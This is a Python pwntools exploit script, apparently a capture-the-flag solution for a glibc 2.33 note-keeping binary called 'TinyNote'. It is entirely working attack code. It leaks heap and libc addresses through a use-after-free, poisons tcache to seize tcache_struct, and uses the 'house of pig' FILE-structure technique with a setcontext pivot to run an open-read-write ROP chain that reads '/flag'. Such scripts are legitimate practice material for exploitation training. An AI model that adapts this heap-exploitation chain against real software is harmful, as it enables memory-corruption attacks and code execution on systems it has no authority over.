# _*_ coding:utf-8 _*_
from pwn import *
import sys
import struct
import os
import hashlib
from hashlib import sha256

# context.log_level = "debug"
context.arch = "amd64"
# context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0','--title', 'gdb', 'bash', '-c']
context.terminal = ['tmux', 'splitw', '-h']
# p = process('./ld-2.33.so ./TinyNote'.split(),env={'LD_PRELOAD':'./libc-2.33.so'})
p = process("./TinyNote")
elf = ELF("./TinyNote")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------
def add(idx):
	sla("Choice:",1)
	sla("Index:",idx)

def edit(idx,con):
	sla("Choice:",2)
	sla("Index:",idx)
	p.sendafter("Content:",con)

def show(idx):
	sla("Choice:",3)
	sla("Index:",idx)

def dele(idx):
	sla("Choice:",4)
	sla("Index:",idx)


#--------------------leak_addr----------------------
add(0)
add(1)
dele(0)
show(0)
p.recvuntil("Content:")
key = uu64()
lg("key")
heap_base = key<<12
lg("heap_base")
dbg()
#利用UAF任意堆地址写改size合并
dele(1)
edit(1,p64((heap_base+0x2b0)^key))
add(1)
add(0)# heap+0x2b0
edit(0,p64(0)+p64(0x421))

for i in range(33):# padding
    add(0)

dele(1)
show(1)
libc_base = l64()-0x1e0c00
lg('libc_base')
#--------------------------------------------------
IO_list_all= libc_base+0x1e15c0
IO_str_jumps=libc_base+0x1e2560
free_hook = libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
magic=libc_base+0x14a0a0# mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
lg("magic")

pop_rdi=libc_base+0x0000000000028a55
pop_rsi=libc_base+0x000000000002a4cf
pop_rdx=libc_base+0x00000000000c7f32
Open=libc_base+libc.sym['open']
Read=libc_base+libc.sym['read']
Write=libc_base+libc.sym['write']
#--------fastbin reverse into tcache---------------
# 利用UAF控制了tcache_struct
# 这里无法直接填满fastbin的原因是，有idx限制，如果改count为7直接来填充fastbin需要能申请很多个不同的chunk
# 用tcache就可以依赖tcache_struct达到绕过申请bin里chunk的目的，实现free_chunk的保留

add(0)
add(1)
dele(0)
dele(1)

edit(1,p64((heap_base+0x10)^key))
add(0)
add(0)# ctrl heap+0x10/cont

add(1)
dele(1)
edit(0,p64(2))

edit(1,p64((heap_base+0x90)^key))
add(1)
add(1)# ctrl heap+0x90/entry

for i in range(8):# full in tcache
    edit(0,p64(0))
    add(2)
    edit(0,p64(i))
    dele(2)

edit(2,p64((IO_list_all+0x70)^key))# set input place

for i in range(6):# tcache into fastbin
    add(2)
    edit(0,p64(7))
    dele(2)
    edit(0,p64(6-i))

edit(0,p64(0))# clear
add(2)# fastbin into tcache
#------------------------house of pig------------------

def change(addr,context):# use tcache_struct to anywhere alloc
    edit(0,p64(1))
    edit(1,p64(addr))
    add(2)
    edit(2,context)
 
size=0x230
start = heap_base + 0x600
end = start + ((size) - 100)//2
# 布置IO
change(heap_base+0x30,p64(0)+p64(0xffffffffffff))#_IO_write_base/ _IO_write_ptr
change(heap_base+0x40,p64(0)+p64(start))# _IO_buf_base
change(heap_base+0x50,p64(end))# _IO_buf_end
change(heap_base+0xd0,p64(0))# _mode
change(heap_base+0xe0,p64(0)+p64(IO_str_jumps))

# 设置跳转
change(heap_base+0x1a0,p64(free_hook))# 用于malloc
change(heap_base+0x600,p64(magic)+p64(heap_base+0x700))# 用于mempy
change(heap_base+0x720,p64(setcontext+61))# 用于magic跳转
change(heap_base+0x7a0,p64(heap_base+0x800)+p64(pop_rdi))# 用于setcontext
change(heap_base+0x7c0,'/flag'.ljust(0x10,'\x00'))

change(heap_base+0x800,p64(heap_base+0x7c0)+p64(pop_rsi))# ORW
change(heap_base+0x810,p64(0)+p64(Open))
change(heap_base+0x820,p64(pop_rdi)+p64(3))
change(heap_base+0x830,p64(pop_rsi)+p64(heap_base+0x900))
change(heap_base+0x840,p64(pop_rdx)+p64(0x50))
change(heap_base+0x850,p64(Read)+p64(pop_rdi))
change(heap_base+0x860,p64(1)+p64(Write))

edit(1,p64(free_hook))
edit(0,p64(1))
add(2) # _IO_flush_all_lockp
p.interactive()
